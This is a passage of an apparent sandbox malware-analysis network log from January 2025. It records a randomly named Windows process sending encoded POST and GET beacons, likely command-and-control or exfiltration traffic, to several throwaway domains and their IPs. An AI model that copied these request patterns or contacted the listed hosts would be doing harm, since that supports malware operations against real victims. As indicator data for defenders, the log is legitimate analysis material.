                                                          Jan 10, 2025 23:06:40.733850956 CET | 117 | IN | Data Ascii: retrans=0&sent_bytes=0&recv_bytes=778&delivery_rate=0&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          11 | 192.168.2.9 | 49986 | 104.21.96.1 | 80 | 5636 | C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 10, 2025 23:06:42.422694921 CET | 1791 | OUT | POST /58m5/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.dejikenkyu.cyou
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1232
                                                          Origin: http://www.dejikenkyu.cyou
                                                          Referer: http://www.dejikenkyu.cyou/58m5/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Ascii: bdi02je=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 [TRUNCATED]
                                                          Jan 10, 2025 23:06:43.329308987 CET | 1236 | IN | HTTP/1.1 301 Moved Permanently
                                                          Date: Fri, 10 Jan 2025 22:06:43 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          x-powered-by: PHP/7.4.33
                                                          x-dns-prefetch-control: on
                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          x-content-type-options: nosniff
                                                          x-frame-options: SAMEORIGIN
                                                          x-xss-protection: 1; mode=block
                                                          strict-transport-security: max-age=31536000;
                                                          referrer-policy: strict-origin-when-cross-origin
                                                          x-litespeed-tag: 2ba_HTTP.404,2ba_HTTP.301
                                                          x-redirect-by: WordPress - Really Simple Security
                                                          location: https://www.dejikenkyu.cyou/58m5/
                                                          x-litespeed-cache-control: no-cache
                                                          cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                          x-turbo-charged-by: LiteSpeed
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sFSQO1u8LeIPvapOftdhJ0S8IcM7mQG%2BxIg9uhnZfi1Uq5%2BuiMteO1XerxlwMsiTpu3hCIJdFNJBqojoe4WCoCuBB%2FS%2Fr95wQ5gUGUDwfAsB2R6O1zN%2F98Ohuabj2hPBD91uii%2F4"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ffff9cd8fb972a4-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1975&min_rtt=1975&rtt_var=987&sent=1&recv=4
                                                          Jan 10, 2025 23:06:43.329379082 CET | 125 | IN | Data Ascii: lost=0&retrans=0&sent_bytes=0&recv_bytes=1791&delivery_rate=0&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          12 | 192.168.2.9 | 49987 | 104.21.96.1 | 80 | 5636 | C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 10, 2025 23:06:44.967472076 CET | 484 | OUT | GET /58m5/?dZOh=OjIxv4&bdi02je=d1pgFl5Hp+GE0WFWsNtmNdDn5tG/BYSJ7zzhJcA1CBHzR3dh5eCk2y1Rogmf0tN3zZBB6GTJ43iUX+nETgktO5t+JdjWSzaOjXca9ruuKiduGBOEEQ== HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.dejikenkyu.cyou
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Jan 10, 2025 23:06:45.893230915 CET | 1236 | IN | HTTP/1.1 301 Moved Permanently
                                                          Date: Fri, 10 Jan 2025 22:06:45 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          x-powered-by: PHP/7.4.33
                                                          x-dns-prefetch-control: on
                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          cache-control: no-cache, must-revalidate, max-age=0
                                                          x-content-type-options: nosniff
                                                          x-frame-options: SAMEORIGIN
                                                          x-xss-protection: 1; mode=block
                                                          strict-transport-security: max-age=31536000;
                                                          referrer-policy: strict-origin-when-cross-origin
                                                          x-redirect-by: WordPress - Really Simple Security
                                                          location: https://www.dejikenkyu.cyou/58m5/?dZOh=OjIxv4&bdi02je=d1pgFl5Hp+GE0WFWsNtmNdDn5tG/BYSJ7zzhJcA1CBHzR3dh5eCk2y1Rogmf0tN3zZBB6GTJ43iUX+nETgktO5t+JdjWSzaOjXca9ruuKiduGBOEEQ==
                                                          x-litespeed-cache: miss
                                                          x-turbo-charged-by: LiteSpeed
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1%2FbrrlOWAikviQPAtkf%2BIOBRQDOOa3wd4VJ8t6MIwrFG%2BHoahvocP2%2FcULui%2BpWd7Ja52N3WPksBIxL%2F6LdF%2BCyuib9oidczLbdeZqmfKFKxRTJasQA1u9v5UPf6pJ%2B6VRSC%2FeO0"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ffff9dd8cc14363-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-
                                                          Jan 10, 2025 23:06:45.893243074 CET | 201 | IN | Data Ascii: iming: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1605&rtt_var=802&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=484&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          13 | 192.168.2.9 | 49988 | 144.76.229.203 | 80 | 5636 | C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 10, 2025 23:06:59.047230959 CET | 748 | OUT | POST /lgqt/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.031233226.xyz
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 196
                                                          Origin: http://www.031233226.xyz
                                                          Referer: http://www.031233226.xyz/lgqt/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Ascii: bdi02je=BHjkbEs4+NQBVMPS4CAjqmuuCLEaNaygfMjFKhNGnY8WzZYmLFtsnyQVWMfsBnLyw14++kYnmzI55jXvJ52Sn07jH/PUwLfOLrXZceZlKSfJlVwM3plchjxB/ewQA3B8cJ53TfekuDXYZTe9lK1pT2d/ZVY3CU7HJN5Hgh8OOTb/YB+dFpGdxXIrNORH
                                                          Jan 10, 2025 23:06:59.671782970 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 10 Jan 2025 22:06:59 GMT
                                                          Server: Apache
                                                          Content-Length: 315
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          14 | 192.168.2.9 | 49989 | 144.76.229.203 | 80 | 5636 | C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 10, 2025 23:07:01.594280005 CET | 772 | OUT | POST /lgqt/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.031233226.xyz
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 220
                                                          Origin: http://www.031233226.xyz
                                                          Referer: http://www.031233226.xyz/lgqt/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Ascii: bdi02je=BHjkbEs4+NQBUt/SjjAj/2uvNrEaG6ykfMnFKg5smrYWz7QmFm1smyQVOcfpc3Lpw18M+mcnmzM55nTvJOCTnk7hLfPW+rfOLrXZcaxDKS3JllAM2LNb9zxAyOwQLXB4cJ4gTeD5uAvYZTO9r71uJmc0ElYoMkSQBalptTxqPTH3SACDUbPGkAIMKpYvaye3wwF6mfnTB0jCfy1ZOg==
                                                          Jan 10, 2025 23:07:02.216759920 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 10 Jan 2025 22:07:02 GMT
                                                          Server: Apache
                                                          Content-Length: 315
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          15 | 192.168.2.9 | 49990 | 144.76.229.203 | 80 | 5636 | C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 10, 2025 23:07:04.148729086 CET | 1785 | OUT | POST /lgqt/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.031233226.xyz
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1232
                                                          Origin: http://www.031233226.xyz
                                                          Referer: http://www.031233226.xyz/lgqt/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Ascii: bdi02je=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 [TRUNCATED]
                                                          Jan 10, 2025 23:07:04.806638956 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 10 Jan 2025 22:07:04 GMT
                                                          Server: Apache
                                                          Content-Length: 315
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          16 | 192.168.2.9 | 49991 | 144.76.229.203 | 80 | 5636 | C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 10, 2025 23:07:06.686569929 CET | 482 | OUT | GET /lgqt/?dZOh=OjIxv4&bdi02je=MFLEYxMapfQGVvab2mlHik76Wq9wcc6WcK+9EDc9rbcpz4NQWkVXiWg1fs3lc2q3xV4dwTIV5BZ4nWHdDq3R5n+AFpmJ+Ly/L7LDS8t/ZQ+0r1kIoA== HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.031233226.xyz
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Jan 10, 2025 23:07:07.337327957 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 10 Jan 2025 22:07:07 GMT
                                                          Server: Apache
                                                          Content-Length: 315
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          17 | 192.168.2.9 | 49992 | 172.67.182.198 | 80 | 5636 | C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 10, 2025 23:07:12.404422045 CET | 745 | OUT | POST /nuxf/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.grimbo.boats
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 196
                                                          Origin: http://www.grimbo.boats
                                                          Referer: http://www.grimbo.boats/nuxf/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Ascii: bdi02je=3YGp3G0dnP4KOVDeKBFlwtTX/eiY1qx8mL9gfIocCM41bOKe+unCcJm0msTdWlRdCT770o4yIOB5uuhB3F8dXlMXCsFLVZY77g7rAqf4t/TRvhztBCaaCyQaF18dPwX33305KUboiQ4SYmjB3nIcFPk2tO47+JtASR0tvMVFdR5hoc3+S4Ffh17HPzh4
                                                          Jan 10, 2025 23:07:13.061772108 CET | 1092 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 10 Jan 2025 22:07:13 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aRv5Eiw%2BuA0NsdnI0lIpjaA4pRK%2BSM%2Bgbr7k8NEJRGzr31dI97GzwQSjUaqtU2VdhkLa92octjvd%2BdeSjDlUhhH1N9b2AlMMvipzpUxQN4q%2FWPjc7iTOFBQIIXxE4tTlNmwl"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ffffa88f83c4322-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1792&min_rtt=1792&rtt_var=896&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=745&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          18 | 192.168.2.9 | 49993 | 172.67.182.198 | 80 | 5636 | C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 10, 2025 23:07:14.958389044 CET | 769 | OUT | POST /nuxf/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.grimbo.boats
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 220
                                                          Origin: http://www.grimbo.boats
                                                          Referer: http://www.grimbo.boats/nuxf/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Ascii: bdi02je=3YGp3G0dnP4KO0zeNmxl2NTWm+iY/Kx4mL5gfMQ2C6Q1cr2e/rLCQpm0pMTUVVRCCT/d0tQyIOF5usJB3U8cYVMRJMFJY5Y77g7rApiXt/bRoVPtDjadISQZC18degXz330bKRCNiSwSYmzB32ITMPk0ye5e4YwZSC8llcFRKC1kidLgDKME0i7gIUoQj9dlwsPgJJ/NwhY4RYC6pw==
                                                          Jan 10, 2025 23:07:15.602125883 CET | 1078 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 10 Jan 2025 22:07:15 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7sZYhGPN8UfK2XzMA%2BQ6xQQz5X%2FdEXNUPDfT50NHIptrBJ6bLMAJw5A4Y1wPyiu1juL6CO%2BPtXPCfRoJZZ4o3C4157raVJDUc5pZ7ZtTUDRpIWCiHD71HUC1v6XldruDWqux"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ffffa98fac080d3-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1472&min_rtt=1472&rtt_var=736&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=769&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Jan 10, 2025 23:07:15.602598906 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          19 | 192.168.2.9 | 49994 | 172.67.182.198 | 80 | 5636 | C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 10, 2025 23:07:17.512401104 CET | 1782 | OUT | POST /nuxf/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.grimbo.boats
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1232
                                                          Origin: http://www.grimbo.boats
                                                          Referer: http://www.grimbo.boats/nuxf/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Ascii: bdi02je= [TRUNCATED]
                                                          Jan 10, 2025 23:07:18.140299082 CET | 1082 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 10 Jan 2025 22:07:18 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h1LSCZap%2FjfVFRruKFfIcsziXKxf8KQLeO3oq8aVtRLmrjYpXDytdI7L4CtK5SJSXcJKHoRGpRhYPishLadCFnzA4PVTOKxluGC9vOlp4RdrwBwVijC5EGT1eOSS7D7M%2B2su"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ffffaa8dde9435d-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1615&rtt_var=807&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1782&delivery_rate=0&cwnd=126&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          20 | 192.168.2.9 | 49995 | 172.67.182.198 | 80 | 5636 | C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 10, 2025 23:07:20.059042931 CET | 481 | OUT | GET /nuxf/?bdi02je=6auJ0yMi6OdsOmW1PnEOwtKK+9KMlfd7htFlcJBIKY8nc6XduaXwfvOOo77xMmoGODzG8ol9XftCv+9phUBaDXIrAZJse5hp6wCZHpS5iNqkumbbXg==&dZOh=OjIxv4 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.grimbo.boats
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Jan 10, 2025 23:07:20.696115971 CET | 1099 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 10 Jan 2025 22:07:20 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w0MsLdmLG8BZIyoU6j1qYC4H4H3iGusq%2F58Lh1WJVIyKQauJ9tyfOBHs8gcEADZwY5B%2FJJhT71X4BT05V68wfeP9CEhaEkts6mpwCLJ%2BlhP813Vf3eLMeFMeQrAc0eWMth1t"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ffffab8e9b742f4-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1605&rtt_var=802&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=481&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          21 | 192.168.2.9 | 49996 | 13.248.169.48 | 80 | 5636 | C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 10, 2025 23:07:25.765160084 CET | 760 | OUT | POST /m1if/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.autonomousoid.pro
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 196
                                                          Origin: http://www.autonomousoid.pro
                                                          Referer: http://www.autonomousoid.pro/m1if/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Ascii: bdi02je=sgqIO03EalyIvNPN58CEXHoN4sQ4khX93fEOgCERGq5dc68ziLyxX2r/ISsRjbaOQTJ7lUgXeBiW3AjflEph6bTKnwXZL3mpSTp4jzfYgeDrmMqJc+Hq8jA9VQeg+XhI528tD+uN3K7jqdVQacz5554TqQATVZFrPNOeQhCPwAKPPV5EQ1cT+2g72j/+
                                                          Jan 10, 2025 23:07:26.218266010 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                          content-length: 0
                                                          connection: close


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          22 | 192.168.2.9 | 49997 | 13.248.169.48 | 80 | 5636 | C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 10, 2025 23:07:28.314491987 CET | 784 | OUT | POST /m1if/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.autonomousoid.pro
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 220
                                                          Origin: http://www.autonomousoid.pro
                                                          Referer: http://www.autonomousoid.pro/m1if/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Ascii: bdi02je=sgqIO03EalyIuvbN27WEAXoK9sQ4tBX53fYOgHkBHZddcYkzw5KxU2r/DysY+raVQTFZlUsXeB2W3BTflz9m6LTMygXhVHmpSTp4jy7yge7rn/yJcfHrxDA+SQeg6XhM529ID/Cr3PnjqdlQaOb6w54V0gBUFrxkBP+CYwTskwesI0FaBHVIrhgcxE2W5y2khh92CSojC4343DkU0g==
                                                          Jan 10, 2025 23:07:28.758781910 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                          content-length: 0
                                                          connection: close


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          23 | 192.168.2.9 | 49998 | 13.248.169.48 | 80 | 5636 | C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 10, 2025 23:07:30.861717939 CET | 1797 | OUT | POST /m1if/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.autonomousoid.pro
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1232
                                                          Origin: http://www.autonomousoid.pro
                                                          Referer: http://www.autonomousoid.pro/m1if/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Jan 10, 2025 23:07:31.325613022 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                          content-length: 0
                                                          connection: close


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
